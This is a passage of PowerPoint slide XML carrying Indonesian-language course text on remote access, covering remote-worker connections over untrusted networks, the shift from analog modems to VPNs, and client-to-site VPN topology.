            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus-kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> workstation, server, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Saat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual (VPN), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet (ISP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway VPN di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model "telecommuter", yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
